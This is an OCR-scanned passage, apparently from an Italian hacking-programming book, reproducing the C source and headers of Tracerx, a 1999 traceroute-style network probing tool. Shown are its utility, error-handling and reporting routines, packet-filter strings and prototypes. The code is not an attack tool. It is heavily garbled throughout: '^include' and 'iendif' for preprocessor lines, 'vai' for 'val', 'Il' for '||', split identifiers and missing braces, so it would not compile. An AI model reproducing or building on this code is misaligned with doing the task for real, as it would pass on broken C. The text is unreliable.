* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 

#if (HAVE_CONFIG_H) 
^include "./config.h" 
iendif 

iinclude " . /tx_struct .h" 
^include " . /tx_packet_capture . h " 



void 

tx_report (int class, u_char *packet, struct tx_control **tx_c) 
{ 

switch (class) 
{ 

case TX_PACKET_IS_EXPIRED : 
break; 

case TX_PACKET_ IS_ TERMINAL : 
break; 

case TX_PACKET_IS_UNREACH_EN_ROUTE : 

break; 
de fault: 

break; 

} 

} 
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/* EOF */ 
tx util.c 



/* 

* $Id: tx_util.c,v 1.2 1999/05/29 20:28:43 route Exp $ 
* 

* Tracerx 

* tx_util.c - varlous routlnes 
* 

* Copyright (c) 1999 Mike D. Schlffman <mlke@lnfonexus . com> 

* Jeremy F. Ranch <jrauch@cadre . org> 

* Ali rights reserved. 
* 

* Redistribution and use in source and blnary forms, wlth or wlthout 

* modlflcatlon, are permitted provided that the followlng condltlons 

* are met : 

* 1 . Redlstrlbutlons of source code must retain the above copyright 

* notice, thls list of conditions and the followlng disclaimer . 

* 2. Redlstrlbutlons in blnary form must reproduce the above copyright 

* notice, this list of conditions and the followlng disclaimer in the 

* documentation and/or other materials provided wlth the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS * "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANT IES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 

#if (HAVE_CONFIG_H) 
^include "./config.h" 
Itendif 

^include " . /tx_main . h " 
^include " . /tx_struct .h" 
^include " . /tx_util.h" 
^include " . /tx_error.h" 

int 

tx_str2int (register const char *str, register const char *what, 
register int min, register int max) 

{ 

register const char *cp; 
register int vai; 
char *ep; 

if (str[0] == '0' && (str[l] == 'x' Il str[l] == 'X')) 
{ 

cp = str + 2; 

vai = (int) strtol (cp, &ep, 16); 

} 

else 
{ 

vai = (int) strtol (str, &ep, 10); 

} 
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{ 

tx_error(FATAL, "\"%s\" bad value for %s \n", str, what) ; 

} 

if (vai < min && min >= 0) 
{ 

if (min == 0) 
{ 

tx_error (FATAL, "%s must be >= %d\n", what, min); 

} 

else 
{ 

tx_error (FATAL, "%s must be > %d\n", what, min - 1) ; 

} 

} 

if (vai > max && max >= 0) 
{ 

tx_error (FATAL, "%s must be <= %d\n", what, max); 

} 

return (vai) ; 



int 

tx_prot_select (char *protocol, struct tx_control **tx_c) 
{ 

char *supp_protocols [ ] = {"UDP", "TCP", "ICMP", 0); 
int i; 

for (i = 0; supp_protocols [i] ; i++) 
{ 

if ( ( ! strcasecmp (supp_protocols [i] , protocol))) 
{ 

switch (i) 
{ 

case 0 : 

/* UDP */ 

(*tx_c) ->packet_size = IP_H + UDP_H + TX_P; 
return (IPPROTO_UDP) ; 
case 1 : 

/* TCP */ 

(*tx_c) ->packet_size = IP_H + TCP_H + TX_P; 
return (IPPROTO_TCP) ; 
case 2: 

/* ICMP */ 

(*tx_c) ->packet_size = IP_H + ICMP_ECHO_H + TX_P; 
return (IPPROTO_ICMP) ; 
de fault: 

tx_error (FATAL, "Unknown protocol: %s\n", protocol) ; 

} 

} 

} 

tx_error (FATAL, "Unknown protocol: %s\n", protocol) ; 
/* UNREACHED (silences compiler warnings) */ 
return (-1) ; 



int 

tx_get_hwaddrs (struct ether_addr **1, struct ether_addr **r, 
struct tx_control **tx_c, u_char *errbuf) 

{ 

*1 = get_hwaddr ( (*tx_c) ->1, (*tx_c) ->device, errbuf) ; 

if (1 == NULL) 

{ 

return (-1) ; 

} 

} 
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La gestione degli errori è dentro al file tx_error.c : 
/* 

* $Id: tx_error.c,v 1.1.1.1 1999/05/28 23:55:06 route Exp $ 
* 

* Tracerx 

* tx_error.c - error handling routlnes 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Jeremy F. Rauch <jrauch@cadre . org> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS * ~AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 

#if (HAVE_CONFIG_H) 
^include "./config.h" 
iendif 

^include " . /tx_main.h" 
^include " . /tx_error . h" 

void 

tx_error(int severity, char *msg, ...) 
{ 

va_list ap; 

char buf [BUFSIZ] ; 

va_start (ap, msg) ; 

vsnprintf (buf , sizeof(buf) - 1, msg, ap) ; 

switch (severity) 
{ 

case WARNING: 

fprintf (stderr, "Warning: "); 

break; 
case CRITICAL: 

fprintf (stderr, "Criticai: ") ; 

break; 



case FATAL: 

fprintf (stderr, "Fatai: "); 
break; 
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va_end (ap) ; 

if (severity == FATAL) 
{ 

exit (EXIT_FAILURE) ; 

} 



Ora vediamo i files d'header tx_framework.h : 
/* 

* $Id: tx_framework.h,v 1.3 1999/06/03 22:06:52 route Exp $ 
* 

* Trace rx 
* 

* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Copyright (c) 1998 Mike D. Schiffman <mds@es2 . net> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. DEDICATED TO ARA. 
* 

*/ 



#ifndef 


_ TX_ TRACERX_H 








idefine 


_ TX_ TRACERX_H 








idefine 


TX_STATIC_PORTS 


Oxl 






idefine 


PACKET_MIN 


IP_H + 


UDP H + 


TX_P 








/* 


min packet size */ 


idefine 


PACKET_MAX 


1500 


/* 


max packet size */ 


idefine 


B URS T_RA TE_MAX 


30 


/* 


max burst rate */ 


idefine 


IP_TTL_MAX 


255 


/* 


max IP TTL */ 


idefine 


PORT_MAX 


65535 


/* 


max port */ 


idefine 


PROBE_MAX 


100 


/* 


max probe count per round */ 


idefine 


WAIT_MAX 


360 


/* 


max time to wait for responses */ 


idefine 


PCAP_BUFSIZ 


576 


/* 


bytes per packet we can capture */ 


int 










tx_init_ 


^control ( 









struct tx_control ** 



); 
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tx_±n±t_network ( 

struct tx_control **, 
char * 

); 

int 

tx_do_scan ( 

struct tx_control ** 

); 

int 

tx_shutdown ( 

struct tx_control ** 

); 

tiendif /* _TX_TRACERX_H */ 
/* EOF */ 

Un altro header tx_packet_build.h : 
/* 

* $Id: tx _packet_build.h,v 1.3 1999/06/03 22:06:52 route Exp $ 
* 

* Tracerx 

* High-level packet construction routines 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Copyright (c) 1998 Mike D. Schiffman <mds@es2 . net> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. DEDICATED TO ARA. 
* 

*/ 

tiifndef _TX_PACKET_BUILD_H 
#define _TX_PACKET_BUILD_H 



int 

tx_packet_build _probe ( 
struct tx_control ** 

); 
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tx__packet_bu±ld _payload( 
struct tx_control **, 
int 

); 



int 

tx_packet_build_udp ( 

struct tx_control ** 

); 



int 

tx_packet_build_tcp ( 

struct tx_control ** 

); 



int 

tx_packet_build_icmp ( 

struct tx_control ** 

); 



int 

tx_packet_update_probe ( 
struct tx_control ** 

); 

#endif /* _TX_PACKET_BUILD_H */ 



/* EOF */ 



tx_packet_inject.h 



/* 
* 



$Id: tx _packet_inject.h,v 1.3 1999/06/03 22:06:52 route Exp $ 
Trace rx 

High-level packet injection routines 



Copyright (c) 1999 Mike D. 
Copyright (c) 1998 Mike D. 
Ali rights reserved. 



Schiffman <mike@infonexus . com> 
Schiffman <mds@es2 . net> 



Redistribution and use in source and binary forms, with or without 
modification, are permitted provided that the following conditions 
are met : 

1 . Redistributions of source code must retain the above copyright 
notice, this list of conditions and the following disclaimer . 

2. Redistributions in binary forni must reproduce the above copyright 
notice, this list of conditions and the following disclaimer in the 
documentation and/or other materials provided with the distribution . 



THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 
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* 

V 

#ifndef _TX_PACKET_INJECT_H 
tidefine _TX_PACKET_INJECT_H 

int 

tx_packet_lnject ( 

struct tx_control ** 

); 



#endlf /* _TX_PACKET_INJECT_H */ 




tx_packet_verify.h 

/* 

* $id$ 
* 

* Tracerx 

* packet verlflcatlon routlnes 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary forni must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANT IES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. DEDICATED TO ARA. 
* 

*/ 

tiifndef _TX_PACKET_VERIFY_H 
#define _TX_PACKET_VERIFY_H 



int 

tx_packet_verify_udp ( 
char * , 

struct tx_control ** 

); 



int 

t x_pa cke t_ veri fy_ tcp ( 
char *, 
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int 

tx__packet_verify_icmp ( 
char * , 

struct tx_control ** 

); 



#endlf /* _TX_PACKET_VERIFY_H */ 




tx_packet_filter.h 
/* 

* $Id: tx _packet_filter.h,v 1.1 1999/06/03 22:06:52 route Exp $ 
* 

* Trace rx 

* packet filtering routlnes 
* 

* Copyright (c) 1999 Mike D. Schlffman <mike@infonexus . com> 

* Ali rights reserved. 
* 

* Redistribution and use in source and blnary forms, with or without 

* modlflcatlon, are permitted provided that the following conditlons 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditlons and the following disclaimer . 

* 2. Redistributions in binary fonti must reproduce the above copyright 

* notice, this list of conditlons and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS * ~AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. DEDICATED TO ARA. 
* 

*/ 

tiifndef _TX_PACKET_FILTER_H 
tidefine _TX_PACKET_FILTER_H 

/* 

* Since we are not putting the interface into promiscuous mode, we don 't 

* need to sift through packets looking for our IP; this simplfies our 

* filter language. For each scan type, we of course need to receive 

* ICMP TTL expired in transit type messages (ICMP type 11) . 

* For UDP, our terminal packet is an unreachable (ICMP type 3) . 

* For TCP, our terminal packet is a TCP RST (or an RST/ACK) . 

* For ICMP, our terminal packet is an ICMP echo reply. 

* However, for the last two, we need to be prepared for unreachables as 

* network conditlons are unpredictable . 
*/ 

tidefine TX_BPF_FIL TER_ UDP "icmp[0] == 11 or icmp[0] == 3" 

#define TX_BPF_FIL TER_ TCP "icmp[0] == 11 or icmp[0] == 3 or tcp[14] == 0x12 
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or tcp[14] == 0x4 or tcp[14] == 0x14" 
tfdeflne TX_BPF_FILTER_ICMP "icmp[0] == 11 or icmp[0] == 3 or ±cmp[0] == 0" 

int 

tx_set_pcap_fllter ( 

char *, /* fllter code to Instali */ 

struct tx_control ** 

); 

tiendif /* _TX_PACKET_FILTER_H */ 



tx_packet_captu re . h 
/* 

* $Id: tx _packet_capture.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $ 
* 

* Trace rx 

* High-level packet Injectlon routines 
* 

* Copyright (c) 1999 Mike D. Seni ff man <mike@infonexus . com> 

* Copyright (c) 1998 Mike D. Schiffman <mds@es2 . net> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANT IES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. DEDICATED TO ARA. 
* 

*/ 

tiifndef _TX_PACKET_CAPTURE_H 
tidefine _TX_PACKET_CAPTURE_H 

tidefine TX_PACKET_IS_BORING 0 

tidefine TX_PACKET_IS_EXPIRED 1 

tidefine TX_PACKET_ IS_ TERMINAL 2 

tidefine TX_PACKET_IS_TERMINAL_EXOTIC 3 

#define TX_PACKET_IS_UNREACH_EN_ROUTE 4 

int 

tx_packet_snatcher ( 

struct tx_control ** 

); 
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/* EOF */ 



tx main.h 



/* 

* $Id: tx_ma±n.h,v 1.2 1999/05/29 20:28:42 route Exp $ 
* 

* TracerX 
* 

* Copyright (c) 1999 Mike D. Schiffman <mlke@lnfonexus . com> 

* Copyright (c) 1998 Mike D. Schiffman <mds@es2 . net> 

* Ali rights reserved. 
* 

* Redistribution and use in source and blnary forms, wlth or without 

* modlflcatlon, are permitted provided that the followlng condltlons 

* are met : 

* 1 . Redlstrlbutlons of source code must retaln the above copyright 

* notice, thls list of conditions and the followlng disclaimer . 

* 2. Redlstrlbutlons in blnary form must reproduce the above copyright 

* notice, this list of conditions and the followlng disclaimer in the 

* documentation and/or other materials provided wlth the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. DEDICATED TO ARA. 
* 

*/ 

tiifndef _MAIN_H 
tidefine _MAIN_H 

iinclude <stdarg.h> 
^include <pcap . h> 
^include <libnet . h> 

idefine BANNER "TracerX (c) 1999 Mike D. Schiffman <mike@infonexus . com> and 
\ 

Jeremy F. Rauch\n<jrauch@cadre.org>. Distribution is unlimited provided due 
\ 

credit is given and no fee is 

charged. \n\nhttp : //www . packet factory . net/tracerx \ 
for more Information . \n " 

void 
usage ( 

char * 

); 



tiendif /* _MAIN_H */ 




tx_report.h 
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* 

* Trace rx 

* Report generation routlnes 
* 

* Copyright (c) 1999 Mike D. Seni ff man <mike@infonexus . com> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS * "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. DEDICATED TO ARA. 
* 

*/ 

tiifndef _TX_REPORT_H 
tidefine _TX_REPORT_H 

iinclude " . /tx_struct .h" 

void 

tx_report ( 
int, 

u_char *, 

struct tx_control ** 

); 



/* The class of packet we are reporting on */ 
/* The packet to report */ 
/* u know this one */ 



tiendif /* _TX_REPORT_H */ 
/* EOF */ 

tx util.h 



* $Id: tx_util.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $ 
* 

* Trace rx 

* Mise routines 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 
notice, this list of conditions and the following disclaimer. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



* notice, this list of condltlons and the followlng dlsclalmer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS * "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT , INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. DEDICATED TO ARA. 
* 

*/ 



tiifndef _TX_UTIL_H 
#define _TX_UTIL_H 

^include " . /tx_struct .h" 



* Converts a string into an integer, handling bounding errors . 

* Accepts base 10 or base 16 numbers . 

* Taken from traceroute and slightly modified. 

* Exits with reason upon error . 
*/ 

/* The converted value */ 



int 

tx_str2int ( 

register const char * 
register const char * 



V 



register int, 
register int 

); 



/* The string containing the value */ 

/* The title of the value (for errors only) 

/* Minimum value */ 
/* Maximum value */ 



int 

tc_prot_select ( 
char *, 

struct tx_control 

); 



/* The protocol number */ 

/* The protocol from the command line */ 
/* U know. . */ 



int 

tx_get_hwaddrs ( 

struct ether_addr **, 
struct ether_addr **, 



*/ 



); 



struct tx_control **, 
u char * 



/* 1 == ok, -1 == err */ 

/* locai ethernet addr (to be filled in) */ 
/* remote ethernet addr (to be filled in) 

/* U know. . */ 
/* errbuf */ 



tx error.h 



* $Id: tx_error.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $ 
* 

* Trace rx 

* Error handling routines 
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* Copyright (c) 1998 Mike D. Schiffman <mds@es2 . net> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer. 

* 2. Redistributions in binary fonti must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS * "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. DEDICATED TO ARA. 
* 

*/ 

tiifndef _TX_ERROR_H 
tidefine _TX_ERROR_H 

tidefine WARNING Oxl 
#define CRITICAL 0x2 
tidefine FATAL 0x4 

void 

tx_error ( 
int, 
char *, 

)} 

tiendif /* _TX_ERROR_H */ 
/* EOF */ 

tx struct.h 



